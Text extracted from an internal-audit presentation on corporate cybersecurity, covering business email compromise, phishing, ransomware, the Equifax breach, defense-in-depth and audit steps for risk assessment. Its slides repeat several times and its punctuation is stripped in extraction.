bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
